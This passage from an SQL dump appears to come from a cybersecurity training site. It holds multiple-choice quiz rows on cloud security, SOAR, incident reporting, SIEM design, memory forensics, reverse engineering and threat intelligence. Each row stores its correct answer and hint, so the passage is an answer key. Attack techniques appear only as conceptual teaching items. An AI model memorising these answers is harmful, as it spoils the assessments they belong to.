(6128, 323, 'What should be blocked by default on S3 buckets?', 2, 'Public Access', 0, 'Privacy', '2025-12-26 23:10:39', '[\"Private Access\", \"Public Access\", \"All Access\", \"Admin Access\"]'),
(6129, 323, 'What does IAM stand for?', 3, 'Identity and Access Management', 0, 'Identity', '2025-12-26 23:10:39', '[\"Internet Access Manager\", \"Identity and Access Management\", \"Internal Admin Module\", \"Instance Access Mode\"]'),
(6130, 324, 'What is Azure Sentinel?', 1, 'Cloud-native SIEM', 0, 'SIEM', '2025-12-26 23:10:39', '[\"Firewall\", \"Cloud-native SIEM\", \"Antivirus\", \"VPN\"]'),
(6131, 324, 'PIM provides:', 2, 'Just-in-time admin access', 0, 'Temporary', '2025-12-26 23:10:39', '[\"Permanent access\", \"Just-in-time admin access\", \"Public access\", \"No access\"]'),
(6132, 324, 'Which service manages secrets in Azure?', 3, 'Key Vault', 0, 'Secrets', '2025-12-26 23:10:39', '[\"Blob Storage\", \"Key Vault\", \"Azure AD\", \"Sentinel\"]'),
(6133, 325, 'What is the #1 cause of cloud breaches?', 1, 'Misconfigurations', 0, 'Config', '2025-12-26 23:10:39', '[\"Hackers\", \"Misconfigurations\", \"Malware\", \"Phishing\"]'),
(6134, 325, 'What does CSPM stand for?', 2, 'Cloud Security Posture Management', 0, 'Posture', '2025-12-26 23:10:39', '[\"Cloud Security Policy Manager\", \"Cloud Security Posture Management\", \"Cyber Security PM\", \"Cloud System Protection Mode\"]'),
(6135, 325, 'Open Security Groups allowing 0.0.0.0/0 SSH is:', 3, 'A critical misconfiguration', 0, 'Bad', '2025-12-26 23:10:39', '[\"Normal\", \"A critical misconfiguration\", \"Recommended\", \"Fast\"]'),
(6136, 326, 'In IaaS, who patches the operating system?', 1, 'The customer', 0, 'You', '2025-12-26 23:10:39', '[\"Provider\", \"The customer\", \"AWS\", \"Nobody\"]'),
(6137, 326, 'The Shared Responsibility Model divides:', 2, 'Security responsibilities between customer and provider', 0, 'Division', '2025-12-26 23:10:39', '[\"Costs\", \"Security responsibilities between customer and provider\", \"Users\", \"Regions\"]'),
(6138, 326, 'Which AWS service detects threats using ML?', 3, 'GuardDuty', 0, 'ML', '2025-12-26 23:10:39', '[\"CloudTrail\", \"GuardDuty\", \"Config\", \"WAF\"]'),
(6139, 326, 'What is Azure Sentinel?', 4, 'Cloud-native SIEM', 0, 'SIEM', '2025-12-26 23:10:39', '[\"VPN\", \"Firewall\", \"Cloud-native SIEM\", \"Storage\"]'),
(6140, 326, 'Public S3 buckets are:', 5, 'A major security risk', 0, 'Bad', '2025-12-26 23:10:39', '[\"Recommended\", \"A major security risk\", \"Fast\", \"Cheap\"]'),
(6141, 326, 'CSPM helps find:', 6, 'Cloud misconfigurations', 0, 'Errors', '2025-12-26 23:10:39', '[\"Malware\", \"Cloud misconfigurations\", \"Users\", \"Costs\"]'),
(6142, 331, 'What is \"Alert Fatigue\"?', 1, 'Being overwhelmed by too many alerts', 0, 'Tired', '2025-12-26 23:11:57', '[\"Being lazy\", \"Being overwhelmed by too many alerts\", \"Not seeing alerts\", \"Fast response\"]'),
(6143, 331, 'Automation provides what key benefit?', 2, 'Speed and consistency', 0, 'Fast', '2025-12-26 23:11:57', '[\"More alerts\", \"Speed and consistency\", \"More cost\", \"Complexity\"]'),
(6144, 331, 'Which task is ideal for automation?', 3, 'Repetitive enrichment lookups', 0, 'Repetitive', '2025-12-26 23:11:57', '[\"Complex investigations\", \"Repetitive enrichment lookups\", \"Board meetings\", \"Hiring\"]'),
(6145, 332, 'What does SOAR stand for?', 1, 'Security Orchestration, Automation, and Response', 0, 'SOAR', '2025-12-26 23:11:57', '[\"Security Operations and Response\", \"Security Orchestration, Automation, and Response\", \"System Organized Auto Response\", \"None\"]'),
(6146, 332, 'Which is an open-source SOAR platform?', 2, 'TheHive / Shuffle', 0, 'Free', '2025-12-26 23:11:57', '[\"Splunk SOAR\", \"TheHive / Shuffle\", \"Cortex XSOAR\", \"IBM Resilient\"]'),
(6147, 332, 'SOAR connects tools through:', 3, 'API integrations', 0, 'APIs', '2025-12-26 23:11:57', '[\"Email\", \"API integrations\", \"Phone calls\", \"Fax\"]'),
(6148, 333, 'What is the first step in a playbook?', 1, 'Trigger (what starts the workflow)', 0, 'Start', '2025-12-26 23:11:57', '[\"Action\", \"Trigger (what starts the workflow)\", \"Closure\", \"Enrichment\"]'),
(6149, 333, 'Why include \"Human in the Loop\"?', 2, 'For critical actions requiring approval', 0, 'Safety', '2025-12-26 23:11:57', '[\"Slower\", \"For critical actions requiring approval\", \"More errors\", \"Fun\"]'),
(6150, 333, 'What should playbooks always include?', 3, 'Logging and error handling', 0, 'Audit', '2025-12-26 23:11:57', '[\"Music\", \"Logging and error handling\", \"Colors\", \"Animations\"]'),
(6151, 334, 'What action is common for malware alerts?', 1, 'Isolate the host', 0, 'Containment', '2025-12-26 23:11:57', '[\"Delete the host\", \"Isolate the host\", \"Ignore\", \"Promote user\"]'),
(6152, 334, 'Threat Intel automation pushes IOCs to:', 2, 'SIEM and Firewall blocklists', 0, 'Block', '2025-12-26 23:11:57', '[\"Email\", \"SIEM and Firewall blocklists\", \"Phone\", \"Printer\"]'),
(6153, 334, 'For suspected account compromise, what should be automated?', 3, 'Force password reset and revoke sessions', 0, 'Reset', '2025-12-26 23:11:57', '[\"Promote user\", \"Force password reset and revoke sessions\", \"Delete account\", \"Ignore\"]'),
(6154, 335, 'Which Python library is used for HTTP calls?', 1, 'requests', 0, 'HTTP', '2025-12-26 23:11:57', '[\"json\", \"requests\", \"socket\", \"hashlib\"]'),
(6155, 335, 'Why is Python popular for security?', 2, 'Simple syntax and great libraries', 0, 'Easy', '2025-12-26 23:11:57', '[\"It is fast\", \"Simple syntax and great libraries\", \"It is new\", \"It is hard\"]'),
(6156, 335, 'What does hashlib calculate?', 3, 'File hashes (MD5, SHA256)', 0, 'Hash', '2025-12-26 23:11:57', '[\"Passwords\", \"File hashes (MD5, SHA256)\", \"Colors\", \"Sound\"]'),
(6157, 336, 'SOAR stands for:', 1, 'Security Orchestration, Automation, and Response', 0, 'SOAR', '2025-12-26 23:11:57', '[\"Security Operations\", \"Security Orchestration, Automation, and Response\", \"System Order\", \"None\"]'),
(6158, 336, 'What is the main benefit of automation?', 2, 'Speed and consistency', 0, 'Faster', '2025-12-26 23:11:57', '[\"More alerts\", \"Speed and consistency\", \"More cost\", \"Complexity\"]'),
(6159, 336, 'What starts a playbook?', 3, 'A trigger (e.g., SIEM alert)', 0, 'Trigger', '2025-12-26 23:11:57', '[\"A human\", \"A trigger (e.g., SIEM alert)\", \"Random chance\", \"Nothing\"]'),
(6160, 336, 'Which Python library makes HTTP API calls?', 4, 'requests', 0, 'Library', '2025-12-26 23:11:57', '[\"json\", \"requests\", \"socket\", \"os\"]'),
(6161, 336, 'For malware alerts, a common automated action is:', 5, 'Isolate the host', 0, 'Contain', '2025-12-26 23:11:57', '[\"Delete files\", \"Isolate the host\", \"Reboot\", \"Ignore\"]'),
(6162, 336, 'TheHive is an example of:', 6, 'Open-source SOAR', 0, 'Free', '2025-12-26 23:11:57', '[\"Commercial SIEM\", \"Open-source SOAR\", \"Antivirus\", \"Firewall\"]'),
(6163, 341, 'Why is real-time documentation important?', 1, 'You will forget details later', 0, 'Accurate', '2025-12-26 23:13:12', '[\"It is not\", \"You will forget details later\", \"It is slower\", \"For fun\"]'),
(6164, 341, 'Documentation is required for:', 2, 'Legal evidence and audits', 0, 'Compliance', '2025-12-26 23:13:12', '[\"Fun\", \"Legal evidence and audits\", \"Nothing\", \"Vacation\"]'),
(6165, 341, 'What should you avoid in documentation?', 3, 'Vague language like \"some malware\"', 0, 'Be specific', '2025-12-26 23:13:12', '[\"Details\", \"Vague language like \\\"some malware\\\"\", \"Timestamps\", \"Evidence\"]'),
(6166, 342, 'What timezone should timelines use?', 1, 'UTC', 0, 'Standard', '2025-12-26 23:13:12', '[\"Local\", \"UTC\", \"EST\", \"Random\"]'),
(6167, 342, 'What should every timeline entry include?', 2, 'Timestamp, Source, Event, Actor', 0, 'Complete', '2025-12-26 23:13:12', '[\"Just time\", \"Timestamp, Source, Event, Actor\", \"Just event\", \"Nothing\"]'),
(6168, 342, 'Why link to evidence in the timeline?', 3, 'To support claims with proof', 0, 'Verification', '2025-12-26 23:13:12', '[\"Decoration\", \"To support claims with proof\", \"Fun\", \"Color\"]'),
(6169, 343, 'What comes first in an incident report?', 1, 'Executive Summary', 0, 'Top', '2025-12-26 23:13:12', '[\"Appendix\", \"Executive Summary\", \"Technical Findings\", \"Timeline\"]'),
(6170, 343, 'Who is the Executive Summary written for?', 2, 'Leadership (non-technical)', 0, 'C-Suite', '2025-12-26 23:13:12', '[\"Hackers\", \"Leadership (non-technical)\", \"Developers\", \"Interns\"]'),
(6171, 343, 'What should you include in an Appendix?', 3, 'Raw logs, hashes, supporting evidence', 0, 'Details', '2025-12-26 23:13:12', '[\"Summary\", \"Raw logs, hashes, supporting evidence\", \"Executive summary\", \"Nothing\"]'),
(6172, 344, 'What should an Executive Summary avoid?', 1, 'Technical jargon', 0, 'Simple', '2025-12-26 23:13:12', '[\"Details\", \"Technical jargon\", \"Impact\", \"Recommendations\"]'),
(6173, 344, 'How should impact be described?', 2, 'In business terms (money, data, reputation)', 0, 'Quantify', '2025-12-26 23:13:12', '[\"Technically\", \"In business terms (money, data, reputation)\", \"Vaguely\", \"Not at all\"]'),
(6174, 344, 'What question should the summary answer?', 3, 'What happened and are we safe?', 0, 'Status', '2025-12-26 23:13:12', '[\"Who is to blame?\", \"What happened and are we safe?\", \"What is for lunch?\", \"Nothing\"]'),
(6175, 345, 'What does MTTD stand for?', 1, 'Mean Time to Detect', 0, 'Detection', '2025-12-26 23:13:12', '[\"Mean Time to Delete\", \"Mean Time to Detect\", \"Maximum Threat Time\", \"None\"]'),
(6176, 345, 'A high False Positive rate indicates:', 2, 'Poor detection rules', 0, 'Bad rules', '2025-12-26 23:13:12', '[\"Good security\", \"Poor detection rules\", \"Fast response\", \"Nothing\"]'),
(6177, 345, 'Why track metrics over time?', 3, 'To identify trends and improvements', 0, 'Progress', '2025-12-26 23:13:12', '[\"For fun\", \"To identify trends and improvements\", \"To delete data\", \"No reason\"]'),
(6178, 346, 'What timezone should incident timelines use?', 1, 'UTC', 0, 'Standard', '2025-12-26 23:13:12', '[\"Local\", \"UTC\", \"EST\", \"Random\"]'),
(6179, 346, 'Who is the Executive Summary written for?', 2, 'Leadership', 0, 'Audience', '2025-12-26 23:13:12', '[\"Hackers\", \"Leadership\", \"Developers\", \"Public\"]'),
(6180, 346, 'What does MTTR stand for?', 3, 'Mean Time to Respond', 0, 'Response', '2025-12-26 23:13:12', '[\"Mean Time to Read\", \"Mean Time to Respond\", \"Max Threat Time\", \"None\"]'),
(6181, 346, 'What should documentation avoid?', 4, 'Vague language', 0, 'Specific', '2025-12-26 23:13:12', '[\"Details\", \"Vague language\", \"Timestamps\", \"Evidence\"]'),
(6182, 346, 'What makes metrics valuable?', 5, 'Tracking trends over time', 0, 'Progress', '2025-12-26 23:13:12', '[\"One-time snapshots\", \"Tracking trends over time\", \"Colors\", \"Nothing\"]'),
(6183, 346, 'An Appendix should contain:', 6, 'Raw evidence and supporting data', 0, 'Details', '2025-12-26 23:13:12', '[\"Summary\", \"Raw evidence and supporting data\", \"Executive summary\", \"Nothing\"]'),
(6184, 361, 'What is the purpose of a message queue (Kafka) in SIEM?', 1, 'Buffer ingestion spikes and decouple collection from indexing', 0, 'Buffer', '2025-12-27 02:16:31', '[\"Speed up queries\", \"Buffer ingestion spikes and decouple collection from indexing\", \"Store logs long-term\", \"Replace the SIEM\"]'),
(6185, 361, 'In tiered storage, where should the last 7 days of logs reside?', 2, 'Hot tier (SSD)', 0, 'Fast', '2025-12-27 02:16:31', '[\"Cold archive\", \"Hot tier (SSD)\", \"Data lake\", \"Backup tapes\"]'),
(6186, 361, 'What does Search Head Cluster provide in Splunk?', 3, 'High availability and load balancing for searches', 0, 'HA', '2025-12-27 02:16:31', '[\"Faster indexing\", \"High availability and load balancing for searches\", \"Better parsing\", \"Cheaper storage\"]'),
(6187, 362, 'What does ECS stand for?', 1, 'Elastic Common Schema', 0, 'Schema', '2025-12-27 02:16:31', '[\"Event Collection System\", \"Elastic Common Schema\", \"Enterprise Control System\", \"Endpoint Correlation Service\"]'),
(6188, 362, 'Why normalize logs to a common schema?', 2, 'Enable consistent queries across different log sources', 0, 'Consistency', '2025-12-27 02:16:31', '[\"Make logs smaller\", \"Enable consistent queries across different log sources\", \"Hide sensitive data\", \"Comply with regulations\"]'),
(6189, 362, 'What enrichment might you add during parsing?', 3, 'GeoIP, asset info, threat intelligence', 0, 'Context', '2025-12-27 02:16:31', '[\"Compression\", \"GeoIP, asset info, threat intelligence\", \"Encryption\", \"Deletion markers\"]'),
(6190, 363, 'What is \"Multi-Stage Correlation\"?', 1, 'Detecting attack chains across multiple events/logs', 0, 'Chain', '2025-12-27 02:16:31', '[\"Faster queries\", \"Detecting attack chains across multiple events/logs\", \"Storing more data\", \"Compressing logs\"]'),
(6191, 363, 'Why add whitelists to correlation rules?', 2, 'Reduce false positives from known-good sources', 0, 'Tune', '2025-12-27 02:16:31', '[\"Make rules slower\", \"Reduce false positives from known-good sources\", \"Delete logs\", \"Add encryption\"]'),
(6192, 363, 'What is \"Absence Detection\"?', 3, 'Alerting when an expected event does NOT occur', 0, 'Missing', '2025-12-27 02:16:31', '[\"Detecting attackers\", \"Alerting when an expected event does NOT occur\", \"Finding duplicates\", \"Searching faster\"]'),
(6193, 364, 'Why filter early in a query?', 1, 'Reduce data volume before expensive operations', 0, 'Performance', '2025-12-27 02:16:31', '[\"Make results pretty\", \"Reduce data volume before expensive operations\", \"Add more logs\", \"Comply with laws\"]'),
(6194, 364, 'Which wildcard placement is more efficient?', 2, 'Suffix: admin* (not *admin)', 0, 'Suffix', '2025-12-27 02:16:31', '[\"Both equal\", \"Suffix: admin* (not *admin)\", \"Prefix: *admin\", \"Neither\"]'),
(6195, 364, 'What does \"indexed field\" mean?', 3, 'A field the SIEM can search quickly without scanning all data', 0, 'Fast lookup', '2025-12-27 02:16:31', '[\"A calculated field\", \"A field the SIEM can search quickly without scanning all data\", \"A deleted field\", \"A hidden field\"]'),
(6196, 365, 'What is Sigma?', 1, 'Vendor-agnostic detection rule format', 0, 'Universal', '2025-12-27 02:16:31', '[\"A SIEM product\", \"Vendor-agnostic detection rule format\", \"A programming language\", \"A log format\"]'),
(6197, 365, 'Why use version control for detections?', 2, 'Track changes and enable rollback', 0, 'Git', '2025-12-27 02:16:31', '[\"Make detections slower\", \"Track changes and enable rollback\", \"Hide detections\", \"Compress rules\"]'),
(6198, 365, 'What tool executes real attack techniques for testing?', 3, 'Atomic Red Team', 0, 'Test', '2025-12-27 02:16:31', '[\"Sigma\", \"Atomic Red Team\", \"Splunk\", \"Wireshark\"]'),
(6199, 366, 'In a tiered storage model, where are recent logs stored?', 1, 'Hot tier (SSD)', 0, 'Tier', '2025-12-27 02:16:31', '[\"Cold archive\", \"Hot tier (SSD)\", \"Tape\", \"Cloud only\"]'),
(6200, 366, 'What does OCSF stand for?', 2, 'Open Cybersecurity Schema Framework', 0, 'Schema', '2025-12-27 02:16:31', '[\"Open Cyber Security Framework\", \"Open Cybersecurity Schema Framework\", \"Online Cloud Security Format\", \"None\"]'),
(6201, 366, 'Multi-Stage Correlation detects:', 3, 'Attack chains across multiple events', 0, 'Chain', '2025-12-27 02:16:31', '[\"Single events\", \"Attack chains across multiple events\", \"Faster searches\", \"Log compression\"]'),
(6202, 366, 'What is the benefit of filtering early in queries?', 4, 'Reduce data volume for faster execution', 0, 'Speed', '2025-12-27 02:16:31', '[\"More results\", \"Reduce data volume for faster execution\", \"Better colors\", \"More logs\"]'),
(6203, 366, 'Sigma rules compile to:', 5, 'SIEM-specific queries (SPL, KQL, etc.)', 0, 'Output', '2025-12-27 02:16:31', '[\"PDFs\", \"SIEM-specific queries (SPL, KQL, etc.)\", \"Executables\", \"Emails\"]'),
(6204, 366, 'Detection-as-Code enables:', 6, 'Version control and CI/CD for detections', 0, 'DevOps', '2025-12-27 02:16:31', '[\"Faster attacks\", \"Version control and CI/CD for detections\", \"More alerts\", \"Less security\"]'),
(6205, 371, 'Why is memory forensics critical for fileless malware?', 1, 'Fileless malware never touches disk; only exists in RAM', 0, 'Volatile', '2025-12-27 02:18:03', '[\"It is faster\", \"Fileless malware never touches disk; only exists in RAM\", \"Disk is encrypted\", \"Memory is smaller\"]'),
(6206, 371, 'When should you capture memory during an incident?', 2, 'Before shutdown or containment actions', 0, 'Early', '2025-12-27 02:18:03', '[\"After formatting\", \"Before shutdown or containment actions\", \"Next week\", \"Never\"]'),
(6207, 371, 'What happens to RAM when power is removed?', 3, 'Data is lost (volatile memory)', 0, 'Gone', '2025-12-27 02:18:03', '[\"Data is saved\", \"Data is lost (volatile memory)\", \"Data is compressed\", \"Data is encrypted\"]'),
(6208, 372, 'Which tool captures Linux memory?', 1, 'LiME (Linux Memory Extractor)', 0, 'Linux', '2025-12-27 02:18:03', '[\"WinPMEM\", \"LiME (Linux Memory Extractor)\", \"DumpIt\", \"FTK Imager\"]'),
(6209, 372, 'What is hiberfil.sys?', 2, 'Windows hibernation file containing RAM contents', 0, 'Sleep', '2025-12-27 02:18:03', '[\"A log file\", \"Windows hibernation file containing RAM contents\", \"A virus\", \"A backup file\"]'),
(6210, 372, 'Why run acquisition tool from external USB?', 3, 'Avoid writing to evidence disk and altering it', 0, 'Integrity', '2025-12-27 02:18:03', '[\"Faster speed\", \"Avoid writing to evidence disk and altering it\", \"USB is encrypted\", \"No reason\"]'),
(6211, 373, 'Which plugin finds hidden/unlinked processes?', 1, 'psscan', 0, 'Hidden', '2025-12-27 02:18:03', '[\"pslist\", \"psscan\", \"cmdline\", \"dlllist\"]'),
(6212, 373, 'What does malfind detect?', 2, 'Injected code in process memory', 0, 'Injection', '2025-12-27 02:18:03', '[\"Network connections\", \"Injected code in process memory\", \"File hashes\", \"Passwords\"]'),
(6213, 373, 'What is the difference between pslist and psscan?', 3, 'pslist walks linked list; psscan scans all memory for process structs', 0, 'Scan vs Walk', '2025-12-27 02:18:03', '[\"No difference\", \"pslist walks linked list; psscan scans all memory for process structs\", \"psscan is faster\", \"pslist finds hidden processes\"]'),
(6214, 374, 'What is Process Hollowing?', 1, 'Starting a process suspended and replacing its code', 0, 'Replace', '2025-12-27 02:18:03', '[\"Loading a DLL\", \"Starting a process suspended and replacing its code\", \"Killing a process\", \"Debugging\"]'),
(6215, 374, 'What memory protection is suspicious when combined with code?', 2, 'PAGE_EXECUTE_READWRITE', 0, 'RWX', '2025-12-27 02:18:03', '[\"PAGE_READONLY\", \"PAGE_EXECUTE_READWRITE\", \"PAGE_NOACCESS\", \"PAGE_WRITECOPY\"]'),
(6216, 374, 'How do you detect unlinked/hidden processes?', 3, 'Compare pslist (linked) vs psscan (scanned)', 0, 'Compare', '2025-12-27 02:18:03', '[\"Run antivirus\", \"Compare pslist (linked) vs psscan (scanned)\", \"Reboot\", \"Check Task Manager\"]'),
(6217, 375, 'What does DKOM stand for?', 1, 'Direct Kernel Object Manipulation', 0, 'Kernel', '2025-12-27 02:18:03', '[\"Dynamic Kernel Object Mode\", \"Direct Kernel Object Manipulation\", \"Driver Kernel Object Manager\", \"None\"]'),
(6218, 375, 'How does a rootkit hide a process using DKOM?', 2, 'Unlinks the process from the EPROCESS linked list', 0, 'Unlink', '2025-12-27 02:18:03', '[\"Deletes the executable\", \"Unlinks the process from the EPROCESS linked list\", \"Renames the process\", \"Encrypts the process\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(6219, 375, 'Which Volatility plugin detects SSDT hooks?', 3, 'ssdt', 0, 'Hooks', '2025-12-27 02:18:03', '[\"pslist\", \"netscan\", \"ssdt\", \"malfind\"]'),
(6220, 376, 'What type of malware only exists in RAM?', 1, 'Fileless malware', 0, 'Memory-only', '2025-12-27 02:18:03', '[\"Ransomware\", \"Fileless malware\", \"Worm\", \"Trojan\"]'),
(6221, 376, 'Which tool is used for Linux memory acquisition?', 2, 'LiME', 0, 'Linux', '2025-12-27 02:18:03', '[\"WinPMEM\", \"DumpIt\", \"LiME\", \"FTK Imager\"]'),
(6222, 376, 'What does malfind detect?', 3, 'Injected code in process memory', 0, 'Injection', '2025-12-27 02:18:03', '[\"Files\", \"Injected code in process memory\", \"Passwords\", \"Network\"]'),
(6223, 376, 'What is DKOM?', 4, 'Direct Kernel Object Manipulation', 0, 'Rootkit', '2025-12-27 02:18:03', '[\"Dynamic Kernel Mode\", \"Direct Kernel Object Manipulation\", \"Driver Object Manager\", \"None\"]'),
(6224, 376, 'pslist walks the linked list; psscan...', 5, 'Scans all memory for process structures', 0, 'Scan', '2025-12-27 02:18:03', '[\"Is the same\", \"Scans all memory for process structures\", \"Is faster\", \"Only works on Linux\"]'),
(6225, 376, 'What memory protection suggests injected code?', 6, 'PAGE_EXECUTE_READWRITE', 0, 'RWX', '2025-12-27 02:18:03', '[\"PAGE_READONLY\", \"PAGE_EXECUTE_READWRITE\", \"PAGE_GUARD\", \"PAGE_NOACCESS\"]'),
(6226, 381, 'What tool did the NSA release for free?', 1, 'Ghidra', 0, 'Free', '2025-12-27 02:19:34', '[\"IDA Pro\", \"Ghidra\", \"x64dbg\", \"OllyDbg\"]'),
(6227, 381, 'Why extract IOCs from malware?', 2, 'Create signatures and blocklists', 0, 'Detection', '2025-12-27 02:19:34', '[\"For fun\", \"Create signatures and blocklists\", \"Delete the malware\", \"Sell them\"]'),
(6228, 381, 'What is the purpose of a disassembler?', 3, 'Convert machine code to assembly', 0, 'Translate', '2025-12-27 02:19:34', '[\"Run malware\", \"Convert machine code to assembly\", \"Compile code\", \"Debug\"]'),
(6229, 382, 'Which register typically holds return values in x86?', 1, 'EAX', 0, 'Return', '2025-12-27 02:19:34', '[\"EBX\", \"EAX\", \"ECX\", \"ESP\"]'),
(6230, 382, 'What does the CALL instruction do?', 2, 'Calls a function (pushes return address, jumps)', 0, 'Function', '2025-12-27 02:19:34', '[\"Returns\", \"Calls a function (pushes return address, jumps)\", \"Compares\", \"Loops\"]'),
(6231, 382, 'In x64 calling convention, where are the first 4 arguments?', 3, 'Registers (RCX, RDX, R8, R9)', 0, 'Registers', '2025-12-27 02:19:34', '[\"Stack only\", \"Registers (RCX, RDX, R8, R9)\", \"Memory\", \"Nowhere\"]'),
(6232, 383, 'What does \"Xrefs\" show in IDA?', 1, 'Where a function or variable is referenced', 0, 'Cross-reference', '2025-12-27 02:19:34', '[\"Errors\", \"Where a function or variable is referenced\", \"Registry keys\", \"Network calls\"]'),
(6233, 383, 'What does Ghidra\'s decompiler produce?', 2, 'Pseudo-C code from assembly', 0, 'Readable', '2025-12-27 02:19:34', '[\"Executable\", \"Pseudo-C code from assembly\", \"Encrypted code\", \"Packed code\"]'),
(6234, 383, 'Which API is commonly used to inject code into another process?', 3, 'WriteProcessMemory + CreateRemoteThread', 0, 'Injection', '2025-12-27 02:19:34', '[\"CreateFile\", \"WriteProcessMemory + CreateRemoteThread\", \"RegSetValueEx\", \"CryptEncrypt\"]'),
(6235, 384, 'What does F7 do in x64dbg?', 1, 'Step Into (enter function calls)', 0, 'Step', '2025-12-27 02:19:34', '[\"Run\", \"Step Into (enter function calls)\", \"Exit\", \"Breakpoint\"]'),
(6236, 384, 'Why set a breakpoint on VirtualAlloc?', 2, 'Catch memory allocation (often for unpacking)', 0, 'Unpack', '2025-12-27 02:19:34', '[\"It is random\", \"Catch memory allocation (often for unpacking)\", \"Speed up\", \"Delete files\"]'),
(6237, 384, 'What is a common anti-debug API to bypass?', 3, 'IsDebuggerPresent', 0, 'Anti-debug', '2025-12-27 02:19:34', '[\"CreateFile\", \"IsDebuggerPresent\", \"InternetOpen\", \"RegSetValue\"]'),
(6238, 385, 'What is the purpose of a packer?', 1, 'Compress/obfuscate code to evade detection', 0, 'Hide', '2025-12-27 02:19:34', '[\"Speed up malware\", \"Compress/obfuscate code to evade detection\", \"Add features\", \"Make it smaller for email\"]'),
(6239, 385, 'What does API Hashing hide?', 2, 'The names of Windows APIs being called', 0, 'Names', '2025-12-27 02:19:34', '[\"Return values\", \"The names of Windows APIs being called\", \"File paths\", \"Network traffic\"]'),
(6240, 385, 'How do you find the Original Entry Point (OEP)?', 3, 'Set breakpoints on VirtualAlloc, step until unpacked code runs', 0, 'Breakpoint', '2025-12-27 02:19:34', '[\"Run strings\", \"Set breakpoints on VirtualAlloc, step until unpacked code runs\", \"Read documentation\", \"Ask the malware\"]'),
(6241, 386, 'Which tool is NSA\'s free disassembler?', 1, 'Ghidra', 0, 'Free', '2025-12-27 02:19:34', '[\"IDA Pro\", \"Ghidra\", \"x64dbg\", \"OllyDbg\"]'),
(6242, 386, 'Which register holds the return value in x86?', 2, 'EAX', 0, 'Return', '2025-12-27 02:19:34', '[\"EBX\", \"EAX\", \"ECX\", \"EDX\"]'),
(6243, 386, 'What does F7 do in x64dbg?', 3, 'Step Into', 0, 'Debug', '2025-12-27 02:19:34', '[\"Run\", \"Step Into\", \"Step Over\", \"Exit\"]'),
(6244, 386, 'What is the purpose of a packer?', 4, 'Obfuscate and evade detection', 0, 'Hide', '2025-12-27 02:19:34', '[\"Speed up\", \"Obfuscate and evade detection\", \"Add features\", \"Compress for email\"]'),
(6245, 386, 'Which API is used for code injection?', 5, 'WriteProcessMemory', 0, 'Inject', '2025-12-27 02:19:34', '[\"CreateFile\", \"WriteProcessMemory\", \"RegSetValue\", \"CryptEncrypt\"]'),
(6246, 386, 'What does IsDebuggerPresent detect?', 6, 'If the process is being debugged', 0, 'Anti-debug', '2025-12-27 02:19:34', '[\"Malware\", \"If the process is being debugged\", \"Network\", \"Files\"]'),
(6247, 391, 'Who consumes Strategic threat intel?', 1, 'Executives (high-level trends, risk)', 0, 'Leadership', '2025-12-27 02:21:01', '[\"SOC Analysts\", \"Executives (high-level trends, risk)\", \"Developers\", \"Interns\"]'),
(6248, 391, 'What does \"Actionability\" mean for intel?', 2, 'Can we do something with this information?', 0, 'Useful', '2025-12-27 02:21:01', '[\"Is it expensive\", \"Can we do something with this information?\", \"Is it pretty\", \"Is it long\"]'),
(6249, 391, 'Technical intel contains:', 3, 'Hashes, IPs, domains, YARA rules', 0, 'IOCs', '2025-12-27 02:21:01', '[\"Strategy documents\", \"Hashes, IPs, domains, YARA rules\", \"Financial reports\", \"HR data\"]'),
(6250, 392, 'What is MISP?', 1, 'Open-source threat intel sharing platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"A SIEM\", \"Open-source threat intel sharing platform\", \"A firewall\", \"A sandbox\"]'),
(6251, 392, 'What does GreyNoise help distinguish?', 2, 'Background internet noise vs targeted attacks', 0, 'Filter', '2025-12-27 02:21:01', '[\"Good vs bad files\", \"Background internet noise vs targeted attacks\", \"Encrypted vs clear\", \"Fast vs slow\"]'),
(6252, 392, 'What is \"Pivoting\" in threat intel?', 3, 'Using one IOC to discover related infrastructure', 0, 'Connect', '2025-12-27 02:21:01', '[\"Turning around\", \"Using one IOC to discover related infrastructure\", \"Deleting IOCs\", \"Renaming IOCs\"]'),
(6253, 393, 'What is the Diamond Model used for?', 1, 'Relating Adversary, Infrastructure, Capability, and Victim', 0, 'Framework', '2025-12-27 02:21:01', '[\"File analysis\", \"Relating Adversary, Infrastructure, Capability, and Victim\", \"Network monitoring\", \"Encryption\"]'),
(6254, 393, 'Why is attribution difficult?', 2, 'False flags, shared tools, proxy infrastructure', 0, 'Challenges', '2025-12-27 02:21:01', '[\"It is easy\", \"False flags, shared tools, proxy infrastructure\", \"Everyone signs their work\", \"Logs are perfect\"]'),
(6255, 393, 'What does \"High Confidence\" attribution mean?', 3, 'Multiple corroborating sources support it', 0, 'Verified', '2025-12-27 02:21:01', '[\"Guessing\", \"Multiple corroborating sources support it\", \"One source\", \"No evidence\"]'),
(6256, 394, 'What is STIX?', 1, 'JSON format for describing threat intelligence', 0, 'Format', '2025-12-27 02:21:01', '[\"A transport protocol\", \"JSON format for describing threat intelligence\", \"A firewall\", \"A SIEM\"]'),
(6257, 394, 'What does TAXII do?', 2, 'Transport STIX-formatted threat intel', 0, 'Transport', '2025-12-27 02:21:01', '[\"Store files\", \"Transport STIX-formatted threat intel\", \"Encrypt data\", \"Delete IOCs\"]'),
(6258, 394, 'What does TLP:RED mean?', 3, 'Not for disclosure outside the recipient', 0, 'Restricted', '2025-12-27 02:21:01', '[\"Public\", \"Not for disclosure outside the recipient\", \"Community share\", \"Partner share\"]'),
(6259, 395, 'Where can you push IOCs for blocking?', 1, 'Firewall, Proxy, EDR, Email Gateway', 0, 'Enforcement', '2025-12-27 02:21:01', '[\"Nowhere\", \"Firewall, Proxy, EDR, Email Gateway\", \"Only SIEM\", \"Only Email\"]'),
(6260, 395, 'What is a TIP?', 2, 'Threat Intelligence Platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"Threat Inspection Protocol\", \"Threat Intelligence Platform\", \"Technical Investigation Process\", \"None\"]'),
(6261, 395, 'Why is a feedback loop important?', 3, 'Intel team learns if IOCs were useful or false positives', 0, 'Improve', '2025-12-27 02:21:01', '[\"It is not\", \"Intel team learns if IOCs were useful or false positives\", \"To delete intel\", \"To create more alerts\"]'),
(6262, 396, 'Who consumes Strategic intel?', 1, 'Executives', 0, 'Leadership', '2025-12-27 02:21:01', '[\"SOC Analysts\", \"Executives\", \"Developers\", \"All\"]'),
(6263, 396, 'What is MISP?', 2, 'Open-source threat intel platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"SIEM\", \"Open-source threat intel platform\", \"Firewall\", \"EDR\"]'),
